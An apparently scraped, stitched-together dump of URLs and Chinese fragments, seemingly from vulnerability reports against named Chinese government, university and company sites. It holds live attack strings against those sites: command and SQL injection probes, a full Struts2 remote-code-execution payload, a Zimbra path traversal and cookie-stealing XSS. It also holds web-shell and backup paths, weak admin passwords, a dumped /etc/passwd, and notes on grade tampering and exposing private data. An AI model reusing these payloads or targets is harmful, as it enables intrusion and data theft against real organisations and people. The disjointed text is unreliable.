http://www.gsta.com/ http://www.jntrade.gov.cn/yp/web/index.php?userid=yy&menu=1;echo+phpinfo%28%29;exit%28%29 http://new.edingcn.com/install/index.php网站主页,可以在这里购买店铺,然后装修,只不过全都是小吃的店铺,不过也是要花不少钱的。 http://new.edingcn.com/admin/index.php?act=login&op=login http://new.edingcn.com/index.php?act=louceng&op=list&sc_id=91&sc_parent_id=88 http://edingcn.com/admin/index.php?act=login&op=login找到一个家工厂的登录页面。应该还有一个,不去找了,先登录第一个后台,看看功能。 http://hk.chinaunicom.com/hkunicom/portal/news_queryNewscontent.action http://www.xfjr.gov.cn/SysAdmin/ http://nz.xfjr.gov.cn/UserRegCheck.asp?username= http://nz.xfjr.gov.cn/UserRegCheck.asp?username= http://www.xfjr.gov.cn/web.rar http://www.china-seeq.com/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/webapps/mgt/WEB-INF/web.xml http://www.taobao.com/go/act/ebook/ebook_th_khy.php?spm=a1z02.1.882417833.d4911913.A5FgOq&scm=1217.1.1.375 http://thboss.taobao.com/activity/sendAppUrlBySms.do?phone=186******88&type=2&_ksTS=1394089612815_22&callback=jsonp23 javascript:shellcode http://www.china-see.com/hqsj-1.jsp?rightType=1&cid=&fid=&gqdm=100002 http://golf.cctv.com/function/2013gold_court/courtlist.php?area=q http://www.gzaipu.com/ http://www.zdkj.gov.cn/list.asp?id=674 http://jxzx.jmi.edu.cn/report/xscj_report.aspx?xh=083706130101 http://jw.hbliti.com/report/xscj_report.aspx?xh=1005021322 http://60.190.131.220/report/xscj_report.aspx?xh=0802100214 http://login.hxsd.com/index.php http://bbs.hxsd.com http://yyxy.neuq.edu.cn/plus/recommend.php http://vip.xj.189.cn/Club_Area/hdInfo_currt.aspx?clubno=10105024 http://xw.zqgame.com/web.rar http://pingpangchina.com/registerPersonal.action http://hrm.snhr.gov.cn/login.asp https://iforgot.apple.com/password/authenticationmethod?sstt=R%2F4lq8RPm3SXywUjw3WSWK4OaOuL4a7kr0eJS%2Bi6pFREEtFDf1eE6bRwVmrd8WqoGjJVmgBkGllnXa82TLvP%2BlM5Q%2BMl3dfR4XrO7pitq6MwgkBQydfdts0ZIVIJ7jBqYS%2FhM5avMdmbpeWIjjXHZjfv7tBfqw4QAAAAAAAAAAE%3D http://ibi.hzau.edu.cn/clstest/researchers.php?id=120,这个表单存在注入,参数id存在问题 http://m.elong.com/train/order?durationtime=5:36&startdate=201403080700&startstation=%E5%8C%97%E4%BA%AC%E5%8D%97&enddate=201403081236&endstattion=%E4%B8%8A%E6%B5%B7%E8%99%B9%E6%A1%A5&seatlowprice=933&seatname=%E4%B8%80%E7%AD%89%E5%BA%A7&seatcode=M&trainno=G101 http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx http://office.homeinns.com/staffinfo http://t.gmw.cn http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986 http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=1 http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=2 http://my.pclady.com.cn/user/diaryform.jsp www.jiapin.com和jiapin.com得到的ip地址不一样。 http://www.anzhuoapk.com/ http://219.140.166.20/marriage/sysweb/login.action http://wap.lnpu.edu.cn/ http://wap.lnpu.edu.cn/news/showOne?wbnewsid=180721&wbtreeid=12721 http://jwcweb.lnpu.edu.cn:7001),加之之前获得的信息,登录学生和教师的账户,查询或修改成绩: http://jiaofei123.com/pay/cellphone/query.do?phoneNumber=15320727507 https://www.cmpassport.com/后, http://cms.kingdee.com/solutions/business/manufacture/manufactureCaseList.jsp?columnId=150201301401,150202301401,150202302401,150202303401 http://cms.kingdee.com/solutions/business/scm/scmCaseList.jsp?columnId=151201301,151202301 http://ma.apps.cctv.com/Enterprise/EnterpriseInsert.jsp http://exam.gmw.cn/xieliu/images/banner/Accountant/1.jpg(如图) http://exam.gmw.cn/xieliu/images/banner/Accountant/1.jpg/1.php http://tg.gmw.cn/vote/index.php?id=30 http://tg.gmw.cn/install/ http://www.hnisi.com.cn/fckeditor/editor/ http://www.hnisi.com.cn/fckeditor/editor/filemanager/connectors/php/x.php http://www.hnisi.com.cn/sino.php http://www.hnisi.com.cn/fckeditor/editor/filemanager/connectors/4.php 2012.moban.siteserver.cn/siteserver/platform/modal_hotfixUpload.aspx http://2012.moban.siteserver.cn/siteserver/platform/modal_progressBar.aspx?isDownload=True&hotfix=True这个连接的时候,我们还需要将返回包修改,修改方法参见第一步!部分如下: www.bctf.cn http://app.zj165.com http://cps.gome.com.cn/fckeditor/editor/filemanager/browser/default/connectors/test.html http://cam.inc.hc360.com/AccessRes/ http://cam.inc.hc360.com/AccessRes/GetNewCheck.aspx http://cam.inc.hc360.com/AccessRes/ResourceAdj.aspx http://cam.inc.hc360.com/AccessRes/ResourceImport.aspx http://dev.szlt.net/files/slideshow/page/phpinfo.gif/.php https://mail.bankcomm.com/ http://bbs.52pk.com/forum.php?mod=viewthread&tid=6397515&page=1&extra=#pid31108589 http://publicquery.sipo.gov.cn/ http://www.spb.gov.cn/folder9/folder2047/index.html http://zyjd.spb.gov.cn/uploadaction!befforeWai.action?filetype=1 http://account.oppo.com/index.php?q=user/resetPass&username= http://account.oppo.com/index.php?q=user/resetPass&username=【客服】-吻川 http://www.oatos.com/casestudy/ http://app.oatos.com/os/admin.html http://219.148.23.14/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.148.199.8/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.143.125.111/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://115.168.67.196/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://222.85.88.201/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://116.228.55.12/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://61.191.40.114/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.148.199.8/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.148.23.14/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://115.168.67.196/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://202.100.202.56/zk/main/get_pass.php http://www.google.de/#newwindow=1&q=inurl:riseapprove_web http://www.chinapost.com.tw/guidepost/topics/default.asp?id=3577&sub=10 http://www.super.cn http://yddx.ydkgjt.com/phpmyadmin/地址 http://pianke.me/timeline/ http://c22.cmvideo.cn/weibo-portal/ http://c22.cmvideo.cn/weibo-portal/test/UserInfoTaglibs.jsp http://pianke.me/posts/5319be957f8b9a266500004c.html?f=homepage http://www.lajy.net/list/jgcs.php?id=127 http://oa.ncu.edu.cn/icons/index1.html http://www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=1&specialid=356&tpl=freshman_file http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=2&specialid=356&tpl=freshman_file www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file http://223.2.10.25/cas/login.action http://223.2.10.26/cas/login.action http://223.2.10.27/cas/login.action http://223.2.10.27/cas/login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean%28false%29,%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23a=%40java.lang.Runtime%40getRuntime%28%29.exec%28%23req.getParameter%28%22cmd%22%29%29.getInputStream%28%29,%23b=new+java.io.InputStreamReader%28%23a%29,%23c=new+java.io.BufferedReader%28%23b%29,%23d=new+char[50000],%23c.read%28%23d%29,%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29,%23s3cur1ty.println%28%23d%29,%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29]&cmd=cmd%20/c%20set http://61.187.56.156:9090 http://221.204.214.88/portal/doLogonAction!doLogon.action http://www.js.chinaunicom.com/shop/template/shop/order_query.shtml www.youyouwin.com”,标题:游戏共赢。首先来说一下我是如何确定这个网站是奇客星空旗下的 http://sns.people.com.cn/下修改个人信息时,有一项是有真实名字的,这里我插入xss代码 qm.zj165.com/sign/news.do?method=showServiceAndHelp&newid=254ACC7AE95D42C297372E11D4DA46E4 http://cnpps.gmw.cn/ http://118.194.32.61/Login.aspx http://118.194.32.61/FCKeditor/editor/fckeditor.html,点击插入图片,然后浏览服务器: http://www.hnair.com/ServiceSupervice_net/ComplaintManage/OutSiteAddForm.aspx www.hnair.com http://www.jscz.gov.cn/pub/jscz/kfcx/ www.jscz.gov.cn/pub/message/kjksfscm.jsp http://www.harczx.gov.cn/cjcx/index.asp www.harczx.gov.cn/cjcx/searchzj.asp http://123.232.125.172:8080/welcome.do http://en.kingdee.com/index.php?option=com_ninj http://e.mosh.cn/contectus/getContent?a_id=4 http://e.mosh.cn/god/getcontent?a_id=62 http://www.jssonghe.cn http://wd.koudai.com/s/2325615 http://202.100.81.123/arweb/table.jsp?hospital=lshzyy http://www.xiamenair.com/test.html http://webcheckin.travelsky.com/webcki/backQuery.do?orgId=MFAIRNEW&pwid=MF_CN http://xs.zj165.com/IOS/.svn/entries http://url/@api/host/version http://url/@api/deki/groups http://url/@api/deki/site/roles http://url/@api/deki/site/services http://url/@api/deki/users http://url/@api/host/blueprints http://www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597 www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597 http://shop.xiamenair.cn/ www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091 www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091 http://218.207.217.37/IVBSYS/member/login.html admin:123456。登录后可以推送消息到通知栏、推送更新、修改APP的启动闪屏等。 http://www.cm-analysis.com/ http://www.cm-analysis.com/logos/20140309/a41e26b2b0588b31e011d72ea8a84325.php http://shop.letv.com/goPay.html?amount=3489&pId=ON-LEZF-ALIPAY-BALANCE-ALP&oId=1403071626642&stage=1&pInfo=ON-LEZF-ALIPAY-BALANCE-ALP_0_0_3489 http://shop.letv.com/goPay.html?amount=0.1&pId=ON-LEZF-ALIPAY-BALANCE-ALP&oId=1403071626642&stage=1&pInfo=ON-LEZF-ALIPAY-BALANCE-ALP_0_0_0.1 http://cbnclub.yicai.com/.svn/entries http://subscribe.yicai.com/.svn/entries http://thinking.yicai.com/.svn/entries http://cbnclub.yicai.com/.svn/entries http://cfv.yicai.com/2009.zip http://cfv.yicai.com/wwwroot.zip http://cfv.yicai.com/2010.zip http://pan.baidu.com/s/1o6sdikU https://www.yypt.com/finance/regist!sendValidateCode.do?0.012081895545985044&mobile=150*******1 https://www.yypt.com/finance/regist!sendValidateCode.do?0.18127401016843408&mobile=150********1 http://www.osrqd.com/HQWCMS/login_login.action height:100%;width:100;position:fixed http://manual.hnair.com/ http://manual.hnair.com/planmanual/planmanual.rar http://220.191.180.230/login.jhtm http://1.dximscreenshot3.yy.yysratic.com/snd_27/46/48/800-9c45ca45a7e8d61848cOa.aud[/dysnd][dyimg http://dzsw.mofcom.gov.cn/login/login.jsp http://dcscyxs.mofcom.gov.cn/questionnaire/300and600/login.jsp?pro_id=6353260&type=1 http://dingzhi.acs.gov.cn/MofCom/updatenew/frame_dc.jsp http://i.koolearn.com/infocenter/priMsg?page= http://rsc.its.csu.edu.cn/web.rar/code www.damai.cn/ajaxArtist.aspx?aleph=st07UiiJ&areaID=1&sex=&type=3&vocation=&_=1394371324365s www.damai.cn/ajaxArtist.aspx?keyword=DGU7u23L&type=3&_=1394371394323 www.damai.cn/ajaxArtist.aspx?aleph=&areaID=1&sex=&type=3&vocation=flrDUByf&_=1394371324365 http://www.hljsch.com/Checksearch/Checkinfo.aspx?checkId=9745757 http://www.gdxxws.com/Checksearch/Checkinfo.aspx?checkId=9745757 http://www.hljsch.com/Jkhzb/jkhzbprint.aspx?rid=2&schoolbh=2306&stjnd=20131&schooltype=0'&tjtype=1 http://jyxx.shumc.edu.cn/adminiscentertrator/AdmLogin.asp http://202.121.244.134/adminiscentertrator/AdmLogin.asp http://jiuye.sbs.edu.cn/adminiscentertrator/AdmLogin.asp http://job.xq.sh.cn/adminiscentertrator/AdmLogin.asp http://www.lidapoly.com/job/adminiscentertrator/AdmLogin.asp http://job.sicfl.edu.cn/adminiscentertrator/AdmLogin.asp http://job.smic.edu.cn/adminiscentertrator/AdmLogin.asp http://jyxx.sihs.edu.cn/adminiscentertrator/AdmLogin.asp http://item.taobao.com/item.htm?spm=a230r.1.14.1.5aail6&id=37643222453&qq-pf-to=pcqq.c2c http://tieba.baidu.com/game/browse/drawIndex?qq-pf-to=pcqq.discussion http://tieba.lecai.com/user/ajax_phone_authcode_send.php?mobile=150********1 http://wooyun.org/bugs/wooyun-2013-028083/trace/cb41b9ed8e389d6da2cd33f5b85701e2 http://demo.javapms.com/ http://demo.javapms.com/member/index.jsp http://sc.189.cn/internet/ftth/getFtthInfo.jsp,任意输入一个开通了宽带的手机号或者座机号(不加区号),在选好对应的城市。即可查询到安装者的住址等信息。 http://baike.baidu.com/view/51291.htm) http://daj.nc.gov.cn/morehc.asp?taskNo=001005001 http://dingyue.fumu.com/ http://www.szfcsc.com/web/PubInfo/ysxx.asp?ysxkz=2013001 http://www.dynasunhotel.com/room.asp?Id=125 www.ngcz.tv http://120.197.95.240:8080/login.action http://120.197.95.240:8080/css/jack.jsp) http://atpd.travelsky.com/ http://atpd.travelsky.com/InterfaceWebservice/大客户接口文档/航信接口平台使用手册V1.1.3版.doc www.zdnet.com.cn/files/daiyan/test.php view-source:http://www.zdnet.com.cn/files/daiyan/test.php www.zdnet.com.cn/files/ http://www.zdnet.com.cn/files/quest_openx_write.php http://www.zdnet.com.cn/files/search_all_techzone.php http://www.zdnet.com.cn/files/keyword_filter.php http://support.zte.com.cn/support/index.aspx url:http://support.zte.com.cn/support/admin/RegisterLDAP.aspx url:http://support.zte.com.cn/support/ascx/GetUser.aspx?userName=c intile:jspspy,搜到的 http://rs.hntelecom.net.cn/ http://122.202.164.10:8080/portal/后面加任意参数跳转到错误页面然后审查元素修改url www.nearme.com.cn www.oppo.com能否登录 http://mall.cntv.cn http://itv.v3.js.ct10000.com/mystruts/login_realTimeSendInfo.action http://www.csp.gov.cn/ http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac http://mdsn9.hangzhou.com.cn/usershow.php?uid=1870 http://mdsn9.hangzhou.com.cn/admin http://www.baidu.com/p/sys/data/time/timeline?category=年月1|年月2|年月n&offset=事件偏移量&portrait=一个ID,可以在个人主页网页源码中看到 http://www.baidu.com/p/sys/data/time/timeline?category=201403&offset=0&portrait=我的ID http://www.9h.com.cn/defray/defrayIndex.action http://appadmin.jiumei.com/ http://wapqh.189.cn,一路畅通无阻…… http://sms.xz.vnet.cn:7002/User/upgroupfile.asp http://sms.xz.vnet.cn:8044 http://sms.xz.vnet.cn https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test http://rw.baidu.com/forum.php?mod=viewthread&tid=1082&extra=page%3D1 http://movie.damai.cn/ http://mail.eco.gov.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 www.china-cba.net http://106.37.172.4/WebUI/Login.aspx http://www.tanbu.gov.cn/travelsDetails.php?newsid=332 http://bbs.160.com/ http://eng.impulsefitness.com/product-list2.aspx?SID=21 http://211.144.152.51/ http://jbq.tourzj.gov.cn/jbgk_1.aspx?id=1 http://xyzs.com/ http://admin.xyzs.com/ http://bbs.share.youku.com/forum.php?mod=viewthread&tid=2114 http://nyj.jl.gov.cn/AgencyView.php?Id=1存在多种注入漏洞。可通过注入获得数据库,列表,管理员,密码等重要数据库信息。 http://usercms.hxsd.com/admincp/archive.php?do=add&channelid=47 http://www.edong.com/host/exclusive_host_detail.aspx?line_Id=-1&Product_Class_Id=1&SystemId=3 http://edong.com/host/exclusive_host_detail.aspx?line_Id=-1&Product_Class_Id=1&SystemId=3 http://www.xjhj.gov.cn/xjhj.gov.cn.rar http://www.sqxzfw.cn/sqxzfw.cn.rar http://www.gdgxs.gov.cn/gdgxs.gov.cn.rar http://www.xjtl.gov.cn/xjtl.rar http://www.xingtang.gov.cn/web.rar http://segmentfault.com/u/shamiao http://bbs.letv.com/forum.php?mod=viewthread&tid=312647&page=1&extra=#pid11815243 http://hr.sf-express.com/jobs/3838/index.php http://go.sohu.com/2013/innovator/showwork.php?work_id=90946 http://,而且还漏了个/ http://photos.indaa.com.cn/index/wsortshow?&offset=20&id=69 http://xxx.xxx.32.151:8080/zabbix/ http://www.ceppbooks.sgcc.com.cn/ http://wubi.sogou.com/bbs/home.php?mod=space&uid=1030345&do=profile&mobile=yes site:zdnet.com.cn inurl:page http://wo.zdnet.com.cn/page/zhuantifayan.php?id=2037347[注入点]对注入点手工测试如图: http://wo.zdnet.com.cn/page/zhuantifayan.php?id=2037347 http://wo.zdnet.com.cn/page/zhuantifayan.php?id=2037347 http://www.oir.pku.edu.cn/ http://bbs.tl.changyou.com/forum.php?mod=viewthread&tid=31298789&extra=page%3D1&page=4 http://www.renren.com/288518215#!/256405***其中足迹可以点击 http://www.renren.com/288518215#//status/status?id=539648288,感谢人人网小伙伴Q的号提供测试。288518215为我的测试号,539648288为小伙伴Q的测试号。两个号为陌生人。 http://sv7.wljy.sdu.edu.cn:8088/jsj/kcxx/knowledge.jsp?id=15 http://221.7.197.12/gxfgw/,出现登录界面,界面右下角有操作手册下载,文档中包含登录系统所使用的用户名和密码。 http://fyyhbank.com/display.php?id=282 http://fyyhbank.com/admin/kindeditor/php/file_manager_json.php?path=/ http://fyyhbank.com/admin/ http://www.pusa123.com/Get_HsfSecnew.php http://data.trust.hexun.com/list.aspx?fundsinvest=2 http://zt.zjmb.gov.cn/forum/qtforumlist.jsp?search_kwd=&begin=2013-03-12&end=2014-03-12 http://zt.zjmb.gov.cn/forum/qtforumlist.jsp?search_kwd=&begin=2013-03-12&end=2014-03-12 http://www.pp.cc/manage/home http://www.594sgk.com/s/ http://shegongku.org/passwd/ http://www.sojb.pw/ http://talk.zj.com/detail.cgi?id=175276 http://www.meilishuo.com/biz/reg_feedback/newyear/?cid=457 http://www.sc-mg.com.cn/news.php?module=news&act=show&classid=12&id=434 http://fanyi.youdao.com/WebpageTranslate?keyfrom=fanyi.web.index&url=http%3A%2F%2Fsuzuki.at.vc%2Ftest%2F2.txt&type=AUTO http://status.renren.com/GetSomeomeDoingList.do?userId=123456&curpage=0 http://bbs.browser.qq.com/uc_server http://jjw.huzhou.gov.cn/vote/login.asp http://game.kingsunsoft.com/UserCenterAjax.aspx?UserID= http://202.98.157.99/ http://outdoor.qq.com/ http://px.admin5.com/ http://jpkc.njau.edu.cn/zyyhjjjx/jxdg/index.asp?id=1 http://jpkc.njau.edu.cn/zyyhjjjx/admin/eWebEditor/admin_login.asp http://www.souvi.com/shownews.asp?sclass=692&bclass=90&id=1064 http://www.souvi.com/about.asp?id=631 http://www.souvi.com/download.asp?id=674 http://www.souvi.com/internet.asp?id=973 http://www.souvi.com/mobile.asp?id=969 http://www.souvi.com/products.asp?id=1056 http://www.souvi.com/project.asp?id=959 http://www.souvi.com/serve.asp?id=955 http://www.souvi.com/showcontent.asp?id=742 http://www.souvi.com/VR.asp?id=964 http://www.hbnky.com/ http://corp.topay.com.cn/b2b/jsp/common/loginAction.action http://corp.topay.com.cn/xyhd/jsp/common/newLogin.do http://eshop.qdaeon.com/index.php?shop_id=7010 http://web.7k7k.com/code/ajax.php http://web.7k7k.com http://220.196.57.147:8080/GetUnit.aspx?RmtpId=0002&service=api_getUnitRmtp&UnitId=0705 http://fs.elong.com/swfupload/swfupload.swf http://lvyou.elong.com/static/swfupload/js/lib/swfupload.swf http://jwgl.hnuc.edu.cn/Public/ShowGGTZ.asp?GGTZID=317【这里】 http://114.255.66.248/jiaowu/Public/ShowGGTZ.asp?GGTZID=218【这里】 http://jw.jzu.cn/jiaowu/Public/ShowGGTZ.asp?GGTZID=1155【这里】 http://219.148.49.53/jiaowu/Public/ShowGGTZ.asp?GGTZID=223【这里】 http://218.197.80.9/jiaowu_fsxy/Public/ShowGGTZ.asp?GGTZID=105【这里】 http://220.196.57.147:8080/ http://www.sctl.com.cn:9080/portal/c http://www.sctl.com.cn:8080/yyoa/ http://web.7k7k.com/source/cms/newServer.php http://web.7k7k.com:80/ http://www.jinjianginns.com/cityattractions/AttractionsSingle2.aspx?sceneryId=160&cityId=3100 http://www.jinjianginns.com/hotel/jChainHotelComment.aspx?unitId=9013&cityId=4101&from=2 http://ticket.cib.com.cn/web.rar http://bbs.160.com/1.tar.gz http://xxxx.xx:8080/global.php,所有均存在路径泄露 http://iread.wo.com.cn/ http://dms.jnc.cn:5881/FYSYS/login.action http://gzgl.etec.edu.cn/ Url:http://www.sxswst.gov.cn/bureau/xxgkContent.asp?fid=732 www.sxswst.gov.cn/bureau/xxgkContent.asp?fid=732 http://xj.vae.ha.cn/1/bl/login.jsp http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741000940564 http://xj.vae.ha.cn/1/tj/stuxj_detail.jsp?editcode=09410105400307 http://xj.vae.ha.cn/1/tj/stuxj_detail.jsp?editcode=09410105400305 http://www.letushuo.com http://sipo-hb.com/Detail.aspx?ContentId=459 http://oa.wxmetro.net/login/Login.jsp http://bbs.xingcloud.com/uc_server/admin.php http://jlsccx.zjt.gov.cn/Law/Search/lawDetailInfo.aspx?Id=35 http://i.koolearn.com/snscustomer/basicinfo site:17wo.cn”一下,得到可能的注入点:http://card.17wo.cn/wap/wap_card.php?id=2548 card.17wo.cn/wap/wap_card.php?id=2548 http://sqlmap.org http://tuya.app.7k7k.com/user/uid/xxxxxxxx http://tuya.app.7k7k.com/user/uid/483959732 http://gzw.zj.gov.cn/module/rss/rssfeed.jsp?colid=18 http://audit.dajie.com/club/YJSProject/editDetail?id=12222&status=2&refer=audit http://k.yiban.cn http://k.yiban.cn/index.php?c=useredit&a=studentdatashow,下图中的所有项目均可更改。 http://iknowyourip.com/getip.php http://k.yiban.cn/index.php?c=useredit&a=userEdit http://www.shenzhenair.com/userManager/regist.jsp http://61.141.235.247:8083/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin asoon:x:500:500::/home/asoon:/bin/bash benny:x:501:501::/home/benny:/bin/bash resin:x:503:503::/home/resin:/bin/bash cc:x:504:504::/home/cc:/bin/bash hadoop:x:505:505::/home/hadoop:/bin/bash http://p2.easou.com/bra.e?flag=0&brandname=%E4%B8%89%E6%98%9F&esid=MujDHuWgZ9Y http://els.abchina.com/student/examinationCenter/studentLookExam.action http://www.tjbhb.com/ http://www.ubao.com/ubao/toLogin.action http://www.k-touch.cn/product/condetail/prod_id/123.html http://sms.tom.com/pk12530/ub/news_admin/engine/index.php http://sms.tom.com/sms_admin/index.html www.doctorcom.com http://mail.cib.com.cn/ http://baozoumanhua.com/ http://jcxt.htinns.com/mail.txt http://hi.haidilao.com/pages/haidl/alter_password_phone.jsp,如下图所示,在找回密码的第一步填写帐号A的手机号和手机收到的验证码: http://www.ztyz.cn:8890/web/webIndex_index.action http://my.mbaobao.com/member/profile/info http://vip.club.sohu.com/szzmjc/public/upload_img/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{window.x=1;confirm%28document.cookie%29}// http://42.120.40.73:8082/ http://42.120.40.73:8081/ www.letushuo.com http://www.letushuo.com/data/baksql/ http://mv.wo.com.cn/ http://graduate.buaa.edu.cn/TutorInfo.jsp?id=14754 zyjd.spb.gov.cn/downloadaction.action http://bbs.xiaomi.cn/thread-8102239-1-1.html http://www.xiaomi.com/会出现需要安全令牌方可登陆 https://i.xiaomi.com/直接登陆,无任何阻拦和提示就登陆成功了,成功登陆到这个网站就不用说了,在转到小米的其他网站都是可以的(通吃大部分小米的网站),https://i.xiaomi.com/是小米个人数据中心,客户的各种隐私都在里面,看截图 http://www.redcross.ecnu.edu.cn/houtai/login.asp http://www.hozoo.com.cn/Uploadpic/200962173257604.xls http://www.hozoo.com.cn/Uploadpic/2009521131459878.xls http://www.hozoo.com.cn/Uploadpic/2009615135449845.xls http://www.hozoo.com.cn/Uploadpic/2009615132934817.xls http://www.hozoo.com.cn/Uploadpic/20098315156729.xls http://www.hozoo.com.cn/Uploadpic/200987153133341.xls http://www.hozoo.com.cn/UploadPic/201003/20100317105435835.doc http://www.lsbchina.com/index.html http://jlzx.bgu.edu.cn:8081/zcxx.zcxxb.do http://www.cugb.edu.cn/gmoreInfo.action?bigClassID=15 http://labs.chinamobile.com/ http://legal.people.com.cn/n/2014/0303/c203936-24509144.html http://123.15.49.75:1000/login.wdm http://www.xdja.com/web/.svn/entries http://tuya.app.7k7k.com/detail/id/2245684 http://job.bjut.edu.cn/bjutCms/course/queryAllCourseInfo.action http://www.shdc.org.cn/yl_forum/forums/list.page)管理员弱口令:admin/admin http://innofair.cofco.com/?a=newsdetails&news_id=114&m=News http://www.busap.com/test.php http://www.busap.com/mybusmylife/comment.php http://dag.chd.edu.cn/news/index.asp?show=242 http://www.hbitsx.com.cn http://www.ks.js.cn http://yz3g.mobi http://www.hbitsx.com.cn/ImageContent.aspx?BlockTypeID=1&IsFirstPage=1 http://www.hbitsx.com.cn/MoreContentList.aspx?QNum=20140125 http://www.hbitsx.com.cn/forum.aspx?QNum=20140125&BlockTypeID=1&IsFirstPage=1 http://food.ks.js.cn/sj_show.aspx?id=1041 http://food.ks.js.cn/web_1/default.aspx?id=1041 http://food.ks.js.cn/ztshow.aspx?id=61 http://food.ks.js.cn/wbshow.aspx?id=1427&keepThis=true&TB_iframe=true&height=350&width=400 http://yz3g.mobi/flow/ http://www.imac.edu.cn/xygk.asp?id=2 http://xj.bnet.cn/si/session/logout.do http://www.masrfb.gov.cn/ http://sz120.ahsz.gov.cn/ http://www.wdqgtzy.gov.cn/ http://www.bbjj.gov.cn/ http://www.wjfy.gov.cn/ http://www.fygh.gov.cn/ http://www.cnjt.gov.cn/ http://www.nmhnhbj.gov.cn http://www.bjgy.gov.cn/ http://lib.zzti.edu.cn/ http://www.nanzhang.jcy.gov.cn/ http://jsj.beichuan.gov.cn/ http://wwkjj.ww.gov.cn/ http://www.qznyw.gov.cn/ http://txx.gov.cn/ 